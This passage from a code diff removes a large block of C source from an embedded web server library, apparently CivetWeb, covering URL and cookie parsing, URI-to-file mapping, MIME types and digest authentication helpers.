-		 * Switch to alternative code path that uses incremental
-		 * allocations.
-		*/
-		va_copy(ap_copy, ap);
-		len = alloc_vprintf2(out_buf, fmt, ap_copy);
-		va_end(ap_copy);
-
-	} else if ((size_t)(len) >= prealloc_size) {
-		/* The pre-allocated buffer not large enough. */
-		/* Allocate a new buffer. */
-		*out_buf = (char *)mg_malloc((size_t)(len) + 1);
-		if (!*out_buf) {
-			/* Allocation failed. Return -1 as "out of memory" error. */
-			return -1;
-		}
-		/* Buffer allocation successful. Store the string there. */
-		va_copy(ap_copy, ap);
-		IGNORE_UNUSED_RESULT(
-		    vsnprintf_impl(*out_buf, (size_t)(len) + 1, fmt, ap_copy));
-		va_end(ap_copy);
-
-	} else {
-		/* The pre-allocated buffer is large enough.
-		 * Use it to store the string and return the address. */
-		va_copy(ap_copy, ap);
-		IGNORE_UNUSED_RESULT(
-		    vsnprintf_impl(prealloc_buf, prealloc_size, fmt, ap_copy));
-		va_end(ap_copy);
-		*out_buf = prealloc_buf;
-	}
-
-	return len;
-}
-
-
-static int
-mg_vprintf(struct mg_connection *conn, const char *fmt, va_list ap)
-{
-	char mem[MG_BUF_LEN];
-	char *buf = NULL;
-	int len;
-
-	if ((len = alloc_vprintf(&buf, mem, sizeof(mem), fmt, ap)) > 0) {
-		len = mg_write(conn, buf, (size_t)len);
-	}
-	if ((buf != mem) && (buf != NULL)) {
-		mg_free(buf);
-	}
-
-	return len;
-}
-
-
-int
-mg_printf(struct mg_connection *conn, const char *fmt, ...)
-{
-	va_list ap;
-	int result;
-
-	va_start(ap, fmt);
-	result = mg_vprintf(conn, fmt, ap);
-	va_end(ap);
-
-	return result;
-}
-
-
-int
-mg_url_decode(const char *src,
-              int src_len,
-              char *dst,
-              int dst_len,
-              int is_form_url_encoded)
-{
-	int i, j, a, b;
-#define HEXTOI(x) (isdigit(x) ? (x - '0') : (x - 'W'))
-
-	for (i = j = 0; (i < src_len) && (j < (dst_len - 1)); i++, j++) {
-		if ((i < src_len - 2) && (src[i] == '%')
-		    && isxdigit(*(const unsigned char *)(src + i + 1))
-		    && isxdigit(*(const unsigned char *)(src + i + 2))) {
-			a = tolower(*(const unsigned char *)(src + i + 1));
-			b = tolower(*(const unsigned char *)(src + i + 2));
-			dst[j] = (char)((HEXTOI(a) << 4) | HEXTOI(b));
-			i += 2;
-		} else if (is_form_url_encoded && (src[i] == '+')) {
-			dst[j] = ' ';
-		} else {
-			dst[j] = src[i];
-		}
-	}
-
-	dst[j] = '\0'; /* Null-terminate the destination */
-
-	return (i >= src_len) ? j : -1;
-}
-
-
-int
-mg_get_var(const char *data,
-           size_t data_len,
-           const char *name,
-           char *dst,
-           size_t dst_len)
-{
-	return mg_get_var2(data, data_len, name, dst, dst_len, 0);
-}
-
-
-int
-mg_get_var2(const char *data,
-            size_t data_len,
-            const char *name,
-            char *dst,
-            size_t dst_len,
-            size_t occurrence)
-{
-	const char *p, *e, *s;
-	size_t name_len;
-	int len;
-
-	if ((dst == NULL) || (dst_len == 0)) {
-		len = -2;
-	} else if ((data == NULL) || (name == NULL) || (data_len == 0)) {
-		len = -1;
-		dst[0] = '\0';
-	} else {
-		name_len = strlen(name);
-		e = data + data_len;
-		len = -1;
-		dst[0] = '\0';
-
-		/* data is "var1=val1&var2=val2...". Find variable first */
-		for (p = data; p + name_len < e; p++) {
-			if (((p == data) || (p[-1] == '&')) && (p[name_len] == '=')
-			    && !mg_strncasecmp(name, p, name_len) && 0 == occurrence--) {
-				/* Point p to variable value */
-				p += name_len + 1;
-
-				/* Point s to the end of the value */
-				s = (const char *)memchr(p, '&', (size_t)(e - p));
-				if (s == NULL) {
-					s = e;
-				}
-				/* assert(s >= p); */
-				if (s < p) {
-					return -3;
-				}
-
-				/* Decode variable into destination buffer */
-				len = mg_url_decode(p, (int)(s - p), dst, (int)dst_len, 1);
-
-				/* Redirect error code from -1 to -2 (destination buffer too
-				 * small). */
-				if (len == -1) {
-					len = -2;
-				}
-				break;
-			}
-		}
-	}
-
-	return len;
-}
-
-
-/* HCP24: some changes to compare hole var_name */
-int
-mg_get_cookie(const char *cookie_header,
-              const char *var_name,
-              char *dst,
-              size_t dst_size)
-{
-	const char *s, *p, *end;
-	int name_len, len = -1;
-
-	if ((dst == NULL) || (dst_size == 0)) {
-		return -2;
-	}
-
-	dst[0] = '\0';
-	if ((var_name == NULL) || ((s = cookie_header) == NULL)) {
-		return -1;
-	}
-
-	name_len = (int)strlen(var_name);
-	end = s + strlen(s);
-	for (; (s = mg_strcasestr(s, var_name)) != NULL; s += name_len) {
-		if (s[name_len] == '=') {
-			/* HCP24: now check is it a substring or a full cookie name */
-			if ((s == cookie_header) || (s[-1] == ' ')) {
-				s += name_len + 1;
-				if ((p = strchr(s, ' ')) == NULL) {
-					p = end;
-				}
-				if (p[-1] == ';') {
-					p--;
-				}
-				if ((*s == '"') && (p[-1] == '"') && (p > s + 1)) {
-					s++;
-					p--;
-				}
-				if ((size_t)(p - s) < dst_size) {
-					len = (int)(p - s);
-					mg_strlcpy(dst, s, (size_t)len + 1);
-				} else {
-					len = -3;
-				}
-				break;
-			}
-		}
-	}
-	return len;
-}
-
-
-#if defined(USE_WEBSOCKET) || defined(USE_LUA)
-static void
-base64_encode(const unsigned char *src, int src_len, char *dst)
-{
-	static const char *b64 =
-	    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
-	int i, j, a, b, c;
-
-	for (i = j = 0; i < src_len; i += 3) {
-		a = src[i];
-		b = ((i + 1) >= src_len) ? 0 : src[i + 1];
-		c = ((i + 2) >= src_len) ? 0 : src[i + 2];
-
-		dst[j++] = b64[a >> 2];
-		dst[j++] = b64[((a & 3) << 4) | (b >> 4)];
-		if (i + 1 < src_len) {
-			dst[j++] = b64[(b & 15) << 2 | (c >> 6)];
-		}
-		if (i + 2 < src_len) {
-			dst[j++] = b64[c & 63];
-		}
-	}
-	while (j % 4 != 0) {
-		dst[j++] = '=';
-	}
-	dst[j++] = '\0';
-}
-#endif
-
-
-#if defined(USE_LUA)
-static unsigned char
-b64reverse(char letter)
-{
-	if ((letter >= 'A') && (letter <= 'Z')) {
-		return letter - 'A';
-	}
-	if ((letter >= 'a') && (letter <= 'z')) {
-		return letter - 'a' + 26;
-	}
-	if ((letter >= '0') && (letter <= '9')) {
-		return letter - '0' + 52;
-	}
-	if (letter == '+') {
-		return 62;
-	}
-	if (letter == '/') {
-		return 63;
-	}
-	if (letter == '=') {
-		return 255; /* normal end */
-	}
-	return 254; /* error */
-}
-
-
-static int
-base64_decode(const unsigned char *src, int src_len, char *dst, size_t *dst_len)
-{
-	int i;
-	unsigned char a, b, c, d;
-
-	*dst_len = 0;
-
-	for (i = 0; i < src_len; i += 4) {
-		a = b64reverse(src[i]);
-		if (a >= 254) {
-			return i;
-		}
-
-		b = b64reverse(((i + 1) >= src_len) ? 0 : src[i + 1]);
-		if (b >= 254) {
-			return i + 1;
-		}
-
-		c = b64reverse(((i + 2) >= src_len) ? 0 : src[i + 2]);
-		if (c == 254) {
-			return i + 2;
-		}
-
-		d = b64reverse(((i + 3) >= src_len) ? 0 : src[i + 3]);
-		if (d == 254) {
-			return i + 3;
-		}
-
-		dst[(*dst_len)++] = (a << 2) + (b >> 4);
-		if (c != 255) {
-			dst[(*dst_len)++] = (b << 4) + (c >> 2);
-			if (d != 255) {
-				dst[(*dst_len)++] = (c << 6) + d;
-			}
-		}
-	}
-	return -1;
-}
-#endif
-
-
-static int
-is_put_or_delete_method(const struct mg_connection *conn)
-{
-	if (conn) {
-		const char *s = conn->request_info.request_method;
-		return (s != NULL) && (!strcmp(s, "PUT") || !strcmp(s, "DELETE")
-		                       || !strcmp(s, "MKCOL") || !strcmp(s, "PATCH"));
-	}
-	return 0;
-}
-
-
-#if !defined(NO_FILES)
-static int
-extention_matches_script(
-    struct mg_connection *conn, /* in: request (must be valid) */
-    const char *filename        /* in: filename  (must be valid) */
-    )
-{
-#if !defined(NO_CGI)
-	if (match_prefix(conn->ctx->config[CGI_EXTENSIONS],
-	                 strlen(conn->ctx->config[CGI_EXTENSIONS]),
-	                 filename) > 0) {
-		return 1;
-	}
-#endif
-#if defined(USE_LUA)
-	if (match_prefix(conn->ctx->config[LUA_SCRIPT_EXTENSIONS],
-	                 strlen(conn->ctx->config[LUA_SCRIPT_EXTENSIONS]),
-	                 filename) > 0) {
-		return 1;
-	}
-#endif
-#if defined(USE_DUKTAPE)
-	if (match_prefix(conn->ctx->config[DUKTAPE_SCRIPT_EXTENSIONS],
-	                 strlen(conn->ctx->config[DUKTAPE_SCRIPT_EXTENSIONS]),
-	                 filename) > 0) {
-		return 1;
-	}
-#endif
-	/* filename and conn could be unused, if all preocessor conditions
-	 * are false (no script language supported). */
-	(void)filename;
-	(void)conn;
-
-	return 0;
-}
-
-
-/* For given directory path, substitute it to valid index file.
- * Return 1 if index file has been found, 0 if not found.
- * If the file is found, it's stats is returned in stp. */
-static int
-substitute_index_file(struct mg_connection *conn,
-                      char *path,
-                      size_t path_len,
-                      struct mg_file_stat *filestat)
-{
-	const char *list = conn->ctx->config[INDEX_FILES];
-	struct vec filename_vec;
-	size_t n = strlen(path);
-	int found = 0;
-
-	/* The 'path' given to us points to the directory. Remove all trailing
-	 * directory separator characters from the end of the path, and
-	 * then append single directory separator character. */
-	while ((n > 0) && (path[n - 1] == '/')) {
-		n--;
-	}
-	path[n] = '/';
-
-	/* Traverse index files list. For each entry, append it to the given
-	 * path and see if the file exists. If it exists, break the loop */
-	while ((list = next_option(list, &filename_vec, NULL)) != NULL) {
-		/* Ignore too long entries that may overflow path buffer */
-		if (filename_vec.len > (path_len - (n + 2))) {
-			continue;
-		}
-
-		/* Prepare full path to the index file */
-		mg_strlcpy(path + n + 1, filename_vec.ptr, filename_vec.len + 1);
-
-		/* Does it exist? */
-		if (mg_stat(conn, path, filestat)) {
-			/* Yes it does, break the loop */
-			found = 1;
-			break;
-		}
-	}
-
-	/* If no index file exists, restore directory path */
-	if (!found) {
-		path[n] = '\0';
-	}
-
-	return found;
-}
-#endif
-
-
-static void
-interpret_uri(struct mg_connection *conn, /* in/out: request (must be valid) */
-              char *filename,             /* out: filename */
-              size_t filename_buf_len,    /* in: size of filename buffer */
-              struct mg_file_stat *filestat, /* out: file status structure */
-              int *is_found,                 /* out: file found (directly) */
-              int *is_script_resource,       /* out: handled by a script? */
-              int *is_websocket_request,     /* out: websocket connetion? */
-              int *is_put_or_delete_request  /* out: put/delete a file? */
-              )
-{
-	char const *accept_encoding;
-
-#if !defined(NO_FILES)
-	const char *uri = conn->request_info.local_uri;
-	const char *root = conn->ctx->config[DOCUMENT_ROOT];
-	const char *rewrite;
-	struct vec a, b;
-	int match_len;
-	char gz_path[PATH_MAX];
-	int truncated;
-#if !defined(NO_CGI) || defined(USE_LUA) || defined(USE_DUKTAPE)
-	char *tmp_str;
-	size_t tmp_str_len, sep_pos;
-	int allow_substitute_script_subresources;
-#endif
-#else
-	(void)filename_buf_len; /* unused if NO_FILES is defined */
-#endif
-
-	/* Step 1: Set all initially unknown outputs to zero */
-	memset(filestat, 0, sizeof(*filestat));
-	*filename = 0;
-	*is_found = 0;
-	*is_script_resource = 0;
-
-	/* Step 2: Check if the request attempts to modify the file system */
-	*is_put_or_delete_request = is_put_or_delete_method(conn);
-
-/* Step 3: Check if it is a websocket request, and modify the document
- * root if required */
-#if defined(USE_WEBSOCKET)
-	*is_websocket_request = is_websocket_protocol(conn);
-#if !defined(NO_FILES)
-	if (*is_websocket_request && conn->ctx->config[WEBSOCKET_ROOT]) {
-		root = conn->ctx->config[WEBSOCKET_ROOT];
-	}
-#endif /* !NO_FILES */
-#else  /* USE_WEBSOCKET */
-	*is_websocket_request = 0;
-#endif /* USE_WEBSOCKET */
-
-	/* Step 4: Check if gzip encoded response is allowed */
-	conn->accept_gzip = 0;
-	if ((accept_encoding = mg_get_header(conn, "Accept-Encoding")) != NULL) {
-		if (strstr(accept_encoding, "gzip") != NULL) {
-			conn->accept_gzip = 1;
-		}
-	}
-
-#if !defined(NO_FILES)
-	/* Step 5: If there is no root directory, don't look for files. */
-	/* Note that root == NULL is a regular use case here. This occurs,
-	 * if all requests are handled by callbacks, so the WEBSOCKET_ROOT
-	 * config is not required. */
-	if (root == NULL) {
-		/* all file related outputs have already been set to 0, just return
-		 */
-		return;
-	}
-
-	/* Step 6: Determine the local file path from the root path and the
-	 * request uri. */
-	/* Using filename_buf_len - 1 because memmove() for PATH_INFO may shift
-	 * part of the path one byte on the right. */
-	mg_snprintf(
-	    conn, &truncated, filename, filename_buf_len - 1, "%s%s", root, uri);
-
-	if (truncated) {
-		goto interpret_cleanup;
-	}
-
-	/* Step 7: URI rewriting */
-	rewrite = conn->ctx->config[URL_REWRITE_PATTERN];
-	while ((rewrite = next_option(rewrite, &a, &b)) != NULL) {
-		if ((match_len = match_prefix(a.ptr, a.len, uri)) > 0) {
-			mg_snprintf(conn,
-			            &truncated,
-			            filename,
-			            filename_buf_len - 1,
-			            "%.*s%s",
-			            (int)b.len,
-			            b.ptr,
-			            uri + match_len);
-			break;
-		}
-	}
-
-	if (truncated) {
-		goto interpret_cleanup;
-	}
-
-	/* Step 8: Check if the file exists at the server */
-	/* Local file path and name, corresponding to requested URI
-	 * is now stored in "filename" variable. */
-	if (mg_stat(conn, filename, filestat)) {
-		/* 8.1: File exists. */
-		*is_found = 1;
-
-		/* 8.2: Check if it is a script type. */
-		if (extention_matches_script(conn, filename)) {
-			/* The request addresses a CGI resource, Lua script or
-			 * server-side javascript.
-			 * The URI corresponds to the script itself (like
-			 * /path/script.cgi), and there is no additional resource
-			 * path (like /path/script.cgi/something).
-			 * Requests that modify (replace or delete) a resource, like
-			 * PUT and DELETE requests, should replace/delete the script
-			 * file.
-			 * Requests that read or write from/to a resource, like GET and
-			 * POST requests, should call the script and return the
-			 * generated response. */
-			*is_script_resource = (!*is_put_or_delete_request);
-		}
-
-		/* 8.3: If the request target is a directory, there could be
-		 * a substitute file (index.html, index.cgi, ...). */
-		if (filestat->is_directory) {
-			/* Use a local copy here, since substitute_index_file will
-			 * change the content of the file status */
-			struct mg_file_stat tmp_filestat;
-			memset(&tmp_filestat, 0, sizeof(tmp_filestat));
-
-			if (substitute_index_file(
-			        conn, filename, filename_buf_len, &tmp_filestat)) {
-
-				/* Substitute file found. Copy stat to the output, then
-				 * check if the file is a script file */
-				*filestat = tmp_filestat;
-
-				if (extention_matches_script(conn, filename)) {
-					/* Substitute file is a script file */
-					*is_script_resource = 1;
-				} else {
-					/* Substitute file is a regular file */
-					*is_script_resource = 0;
-					*is_found = (mg_stat(conn, filename, filestat) ? 1 : 0);
-				}
-			}
-			/* If there is no substitute file, the server could return
-			 * a directory listing in a later step */
-		}
-		return;
-	}
-
-	/* Step 9: Check for zipped files: */
-	/* If we can't find the actual file, look for the file
-	 * with the same name but a .gz extension. If we find it,
-	 * use that and set the gzipped flag in the file struct
-	 * to indicate that the response need to have the content-
-	 * encoding: gzip header.
-	 * We can only do this if the browser declares support. */
-	if (conn->accept_gzip) {
-		mg_snprintf(
-		    conn, &truncated, gz_path, sizeof(gz_path), "%s.gz", filename);
-
-		if (truncated) {
-			goto interpret_cleanup;
-		}
-
-		if (mg_stat(conn, gz_path, filestat)) {
-			if (filestat) {
-				filestat->is_gzipped = 1;
-				*is_found = 1;
-			}
-			/* Currently gz files can not be scripts. */
-			return;
-		}
-	}
-
-#if !defined(NO_CGI) || defined(USE_LUA) || defined(USE_DUKTAPE)
-	/* Step 10: Script resources may handle sub-resources */
-	/* Support PATH_INFO for CGI scripts. */
-	tmp_str_len = strlen(filename);
-	tmp_str = (char *)mg_malloc_ctx(tmp_str_len + PATH_MAX + 1, conn->ctx);
-	if (!tmp_str) {
-		/* Out of memory */
-		goto interpret_cleanup;
-	}
-	memcpy(tmp_str, filename, tmp_str_len + 1);
-
-	/* Check config, if index scripts may have sub-resources */
-	allow_substitute_script_subresources =
-	    !mg_strcasecmp(conn->ctx->config[ALLOW_INDEX_SCRIPT_SUB_RES], "yes");
-
-	sep_pos = tmp_str_len;
-	while (sep_pos > 0) {
-		sep_pos--;
-		if (tmp_str[sep_pos] == '/') {
-			int is_script = 0, does_exist = 0;
-
-			tmp_str[sep_pos] = 0;
-			if (tmp_str[0]) {
-				is_script = extention_matches_script(conn, tmp_str);
-				does_exist = mg_stat(conn, tmp_str, filestat);
-			}
-
-			if (does_exist && is_script) {
-				filename[sep_pos] = 0;
-				memmove(filename + sep_pos + 2,
-				        filename + sep_pos + 1,
-				        strlen(filename + sep_pos + 1) + 1);
-				conn->path_info = filename + sep_pos + 1;
-				filename[sep_pos + 1] = '/';
-				*is_script_resource = 1;
-				*is_found = 1;
-				break;
-			}
-
-			if (allow_substitute_script_subresources) {
-				if (substitute_index_file(
-				        conn, tmp_str, tmp_str_len + PATH_MAX, filestat)) {
-
-					/* some intermediate directory has an index file */
-					if (extention_matches_script(conn, tmp_str)) {
-
-						char *tmp_str2;
-
-						DEBUG_TRACE("Substitute script %s serving path %s",
-						            tmp_str,
-						            filename);
-
-						/* this index file is a script */
-						tmp_str2 = mg_strdup(filename + sep_pos + 1);
-						mg_snprintf(conn,
-						            &truncated,
-						            filename,
-						            filename_buf_len,
-						            "%s//%s",
-						            tmp_str,
-						            tmp_str2);
-						mg_free(tmp_str2);
-
-						if (truncated) {
-							mg_free(tmp_str);
-							goto interpret_cleanup;
-						}
-						sep_pos = strlen(tmp_str);
-						filename[sep_pos] = 0;
-						conn->path_info = filename + sep_pos + 1;
-						*is_script_resource = 1;
-						*is_found = 1;
-						break;
-
-					} else {
-
-						DEBUG_TRACE("Substitute file %s serving path %s",
-						            tmp_str,
-						            filename);
-
-						/* non-script files will not have sub-resources */
-						filename[sep_pos] = 0;
-						conn->path_info = 0;
-						*is_script_resource = 0;
-						*is_found = 0;
-						break;
-					}
-				}
-			}
-
-			tmp_str[sep_pos] = '/';
-		}
-	}
-
-	mg_free(tmp_str);
-
-#endif /* !defined(NO_CGI) || defined(USE_LUA) || defined(USE_DUKTAPE) */
-#endif /* !defined(NO_FILES) */
-	return;
-
-#if !defined(NO_FILES)
-/* Reset all outputs */
-interpret_cleanup:
-	memset(filestat, 0, sizeof(*filestat));
-	*filename = 0;
-	*is_found = 0;
-	*is_script_resource = 0;
-	*is_websocket_request = 0;
-	*is_put_or_delete_request = 0;
-#endif /* !defined(NO_FILES) */
-}
-
-
-/* Check whether full request is buffered. Return:
- * -1  if request or response is malformed
- *  0  if request or response is not yet fully buffered
- * >0  actual request length, including last \r\n\r\n */
-static int
-get_http_header_len(const char *buf, int buflen)
-{
-	int i;
-	for (i = 0; i < buflen; i++) {
-		/* Do an unsigned comparison in some conditions below */
-		const unsigned char c = ((const unsigned char *)buf)[i];
-
-		if ((c < 128) && ((char)c != '\r') && ((char)c != '\n')
-		    && !isprint(c)) {
-			/* abort scan as soon as one malformed character is found */
-			return -1;
-		}
-
-		if (i < buflen - 1) {
-			if ((buf[i] == '\n') && (buf[i + 1] == '\n')) {
-				/* Two newline, no carriage return - not standard compliant,
-				 * but
-				 * it
-				 * should be accepted */
-				return i + 2;
-			}
-		}
-
-		if (i < buflen - 3) {
-			if ((buf[i] == '\r') && (buf[i + 1] == '\n') && (buf[i + 2] == '\r')
-			    && (buf[i + 3] == '\n')) {
-				/* Two \r\n - standard compliant */
-				return i + 4;
-			}
-		}
-	}
-
-	return 0;
-}
-
-
-#if !defined(NO_CACHING)
-/* Convert month to the month number. Return -1 on error, or month number */
-static int
-get_month_index(const char *s)
-{
-	size_t i;
-
-	for (i = 0; i < ARRAY_SIZE(month_names); i++) {
-		if (!strcmp(s, month_names[i])) {
-			return (int)i;
-		}
-	}
-
-	return -1;
-}
-
-
-/* Parse UTC date-time string, and return the corresponding time_t value. */
-static time_t
-parse_date_string(const char *datetime)
-{
-	char month_str[32] = {0};
-	int second, minute, hour, day, month, year;
-	time_t result = (time_t)0;
-	struct tm tm;
-
-	if ((sscanf(datetime,
-	            "%d/%3s/%d %d:%d:%d",
-	            &day,
-	            month_str,
-	            &year,
-	            &hour,
-	            &minute,
-	            &second) == 6) || (sscanf(datetime,
-	                                      "%d %3s %d %d:%d:%d",
-	                                      &day,
-	                                      month_str,
-	                                      &year,
-	                                      &hour,
-	                                      &minute,
-	                                      &second) == 6)
-	    || (sscanf(datetime,
-	               "%*3s, %d %3s %d %d:%d:%d",
-	               &day,
-	               month_str,
-	               &year,
-	               &hour,
-	               &minute,
-	               &second) == 6) || (sscanf(datetime,
-	                                         "%d-%3s-%d %d:%d:%d",
-	                                         &day,
-	                                         month_str,
-	                                         &year,
-	                                         &hour,
-	                                         &minute,
-	                                         &second) == 6)) {
-		month = get_month_index(month_str);
-		if ((month >= 0) && (year >= 1970)) {
-			memset(&tm, 0, sizeof(tm));
-			tm.tm_year = year - 1900;
-			tm.tm_mon = month;
-			tm.tm_mday = day;
-			tm.tm_hour = hour;
-			tm.tm_min = minute;
-			tm.tm_sec = second;
-			result = timegm(&tm);
-		}
-	}
-
-	return result;
-}
-#endif /* !NO_CACHING */
-
-
-/* Protect against directory disclosure attack by removing '..',
- * excessive '/' and '\' characters */
-static void
-remove_double_dots_and_double_slashes(char *s)
-{
-	char *p = s;
-
-	while ((s[0] == '.') && (s[1] == '.')) {
-		s++;
-	}
-
-	while (*s != '\0') {
-		*p++ = *s++;
-		if ((s[-1] == '/') || (s[-1] == '\\')) {
-			/* Skip all following slashes, backslashes and double-dots */
-			while (s[0] != '\0') {
-				if ((s[0] == '/') || (s[0] == '\\')) {
-					s++;
-				} else if ((s[0] == '.') && (s[1] == '.')) {
-					s += 2;
-				} else {
-					break;
-				}
-			}
-		}
-	}
-	*p = '\0';
-}
-
-
-static const struct {
-	const char *extension;
-	size_t ext_len;
-	const char *mime_type;
-} builtin_mime_types[] = {
-    /* IANA registered MIME types
-     * (http://www.iana.org/assignments/media-types)
-     * application types */
-    {".doc", 4, "application/msword"},
-    {".eps", 4, "application/postscript"},
-    {".exe", 4, "application/octet-stream"},
-    {".js", 3, "application/javascript"},
-    {".json", 5, "application/json"},
-    {".pdf", 4, "application/pdf"},
-    {".ps", 3, "application/postscript"},
-    {".rtf", 4, "application/rtf"},
-    {".xhtml", 6, "application/xhtml+xml"},
-    {".xsl", 4, "application/xml"},
-    {".xslt", 5, "application/xml"},
-
-    /* fonts */
-    {".ttf", 4, "application/font-sfnt"},
-    {".cff", 4, "application/font-sfnt"},
-    {".otf", 4, "application/font-sfnt"},
-    {".aat", 4, "application/font-sfnt"},
-    {".sil", 4, "application/font-sfnt"},
-    {".pfr", 4, "application/font-tdpfr"},
-    {".woff", 5, "application/font-woff"},
-
-    /* audio */
-    {".mp3", 4, "audio/mpeg"},
-    {".oga", 4, "audio/ogg"},
-    {".ogg", 4, "audio/ogg"},
-
-    /* image */
-    {".gif", 4, "image/gif"},
-    {".ief", 4, "image/ief"},
-    {".jpeg", 5, "image/jpeg"},
-    {".jpg", 4, "image/jpeg"},
-    {".jpm", 4, "image/jpm"},
-    {".jpx", 4, "image/jpx"},
-    {".png", 4, "image/png"},
-    {".svg", 4, "image/svg+xml"},
-    {".tif", 4, "image/tiff"},
-    {".tiff", 5, "image/tiff"},
-
-    /* model */
-    {".wrl", 4, "model/vrml"},
-
-    /* text */
-    {".css", 4, "text/css"},
-    {".csv", 4, "text/csv"},
-    {".htm", 4, "text/html"},
-    {".html", 5, "text/html"},
-    {".sgm", 4, "text/sgml"},
-    {".shtm", 5, "text/html"},
-    {".shtml", 6, "text/html"},
-    {".txt", 4, "text/plain"},
-    {".xml", 4, "text/xml"},
-
-    /* video */
-    {".mov", 4, "video/quicktime"},
-    {".mp4", 4, "video/mp4"},
-    {".mpeg", 5, "video/mpeg"},
-    {".mpg", 4, "video/mpeg"},
-    {".ogv", 4, "video/ogg"},
-    {".qt", 3, "video/quicktime"},
-
-    /* not registered types
-     * (http://reference.sitepoint.com/html/mime-types-full,
-     * http://www.hansenb.pdx.edu/DMKB/dict/tutorials/mime_typ.php, ..) */
-    {".arj", 4, "application/x-arj-compressed"},
-    {".gz", 3, "application/x-gunzip"},
-    {".rar", 4, "application/x-arj-compressed"},
-    {".swf", 4, "application/x-shockwave-flash"},
-    {".tar", 4, "application/x-tar"},
-    {".tgz", 4, "application/x-tar-gz"},
-    {".torrent", 8, "application/x-bittorrent"},
-    {".ppt", 4, "application/x-mspowerpoint"},
-    {".xls", 4, "application/x-msexcel"},
-    {".zip", 4, "application/x-zip-compressed"},
-    {".aac",
-     4,
-     "audio/aac"}, /* http://en.wikipedia.org/wiki/Advanced_Audio_Coding */
-    {".aif", 4, "audio/x-aif"},
-    {".m3u", 4, "audio/x-mpegurl"},
-    {".mid", 4, "audio/x-midi"},
-    {".ra", 3, "audio/x-pn-realaudio"},
-    {".ram", 4, "audio/x-pn-realaudio"},
-    {".wav", 4, "audio/x-wav"},
-    {".bmp", 4, "image/bmp"},
-    {".ico", 4, "image/x-icon"},
-    {".pct", 4, "image/x-pct"},
-    {".pict", 5, "image/pict"},
-    {".rgb", 4, "image/x-rgb"},
-    {".webm", 5, "video/webm"}, /* http://en.wikipedia.org/wiki/WebM */
-    {".asf", 4, "video/x-ms-asf"},
-    {".avi", 4, "video/x-msvideo"},
-    {".m4v", 4, "video/x-m4v"},
-    {NULL, 0, NULL}};
-
-
-const char *
-mg_get_builtin_mime_type(const char *path)
-{
-	const char *ext;
-	size_t i, path_len;
-
-	path_len = strlen(path);
-
-	for (i = 0; builtin_mime_types[i].extension != NULL; i++) {
-		ext = path + (path_len - builtin_mime_types[i].ext_len);
-		if ((path_len > builtin_mime_types[i].ext_len)
-		    && (mg_strcasecmp(ext, builtin_mime_types[i].extension) == 0)) {
-			return builtin_mime_types[i].mime_type;
-		}
-	}
-
-	return "text/plain";
-}
-
-
-/* Look at the "path" extension and figure what mime type it has.
- * Store mime type in the vector. */
-static void
-get_mime_type(struct mg_context *ctx, const char *path, struct vec *vec)
-{
-	struct vec ext_vec, mime_vec;
-	const char *list, *ext;
-	size_t path_len;
-
-	path_len = strlen(path);
-
-	if ((ctx == NULL) || (vec == NULL)) {
-		if (vec != NULL) {
-			memset(vec, '\0', sizeof(struct vec));
-		}
-		return;
-	}
-
-	/* Scan user-defined mime types first, in case user wants to
-	 * override default mime types. */
-	list = ctx->config[EXTRA_MIME_TYPES];
-	while ((list = next_option(list, &ext_vec, &mime_vec)) != NULL) {
-		/* ext now points to the path suffix */
-		ext = path + path_len - ext_vec.len;
-		if (mg_strncasecmp(ext, ext_vec.ptr, ext_vec.len) == 0) {
-			*vec = mime_vec;
-			return;
-		}
-	}
-
-	vec->ptr = mg_get_builtin_mime_type(path);
-	vec->len = strlen(vec->ptr);
-}
-
-
-/* Stringify binary data. Output buffer must be twice as big as input,
- * because each byte takes 2 bytes in string representation */
-static void
-bin2str(char *to, const unsigned char *p, size_t len)
-{
-	static const char *hex = "0123456789abcdef";
-
-	for (; len--; p++) {
-		*to++ = hex[p[0] >> 4];
-		*to++ = hex[p[0] & 0x0f];
-	}
-	*to = '\0';
-}
-
-
-/* Return stringified MD5 hash for list of strings. Buffer must be 33 bytes.
- */
-char *
-mg_md5(char buf[33], ...)
-{
-	md5_byte_t hash[16];
-	const char *p;
-	va_list ap;
-	md5_state_t ctx;
-
-	md5_init(&ctx);
-
-	va_start(ap, buf);
-	while ((p = va_arg(ap, const char *)) != NULL) {
-		md5_append(&ctx, (const md5_byte_t *)p, strlen(p));
-	}
-	va_end(ap);
-
-	md5_finish(&ctx, hash);
-	bin2str(buf, hash, sizeof(hash));
-	return buf;
-}
-
-
-/* Check the user's password, return 1 if OK */
-static int
-check_password(const char *method,
-               const char *ha1,
-               const char *uri,
-               const char *nonce,
-               const char *nc,
-               const char *cnonce,
-               const char *qop,
-               const char *response)
-{
-	char ha2[32 + 1], expected_response[32 + 1];
-
-	/* Some of the parameters may be NULL */
-	if ((method == NULL) || (nonce == NULL) || (nc == NULL) || (cnonce == NULL)
-	    || (qop == NULL) || (response == NULL)) {
-		return 0;
-	}
-
-	/* NOTE(lsm): due to a bug in MSIE, we do not compare the URI */
-	if (strlen(response) != 32) {
-		return 0;
-	}
-
-	mg_md5(ha2, method, ":", uri, NULL);
-	mg_md5(expected_response,
-	       ha1,
-	       ":",
-	       nonce,
-	       ":",
-	       nc,
-	       ":",
-	       cnonce,
-	       ":",
-	       qop,
-	       ":",
-	       ha2,
-	       NULL);
-
-	return mg_strcasecmp(response, expected_response) == 0;
-}
-
-
-/* Use the global passwords file, if specified by auth_gpass option,
- * or search for .htpasswd in the requested directory. */
-static void
-open_auth_file(struct mg_connection *conn,
-               const char *path,
-               struct mg_file *filep)
-{
-	if ((conn != NULL) && (conn->ctx != NULL)) {
-		char name[PATH_MAX];
-		const char *p, *e, *gpass = conn->ctx->config[GLOBAL_PASSWORDS_FILE];
-		int truncated;
-
-		if (gpass != NULL) {
-			/* Use global passwords file */
-			if (!mg_fopen(conn, gpass, MG_FOPEN_MODE_READ, filep)) {
-#ifdef DEBUG
-				/* Use mg_cry here, since gpass has been configured. */
-				mg_cry(conn, "fopen(%s): %s", gpass, strerror(ERRNO));
-#endif
-			}
-			/* Important: using local struct mg_file to test path for
-			 * is_directory flag. If filep is used, mg_stat() makes it
-			 * appear as if auth file was opened.
-			 * TODO(mid): Check if this is still required after rewriting
-			 * mg_stat */
-		} else if (mg_stat(conn, path, &filep->stat)
-		           && filep->stat.is_directory) {
-			mg_snprintf(conn,
-			            &truncated,
-			            name,
-			            sizeof(name),
-			            "%s/%s",
-			            path,
-			            PASSWORDS_FILE_NAME);
-
-			if (truncated || !mg_fopen(conn, name, MG_FOPEN_MODE_READ, filep)) {
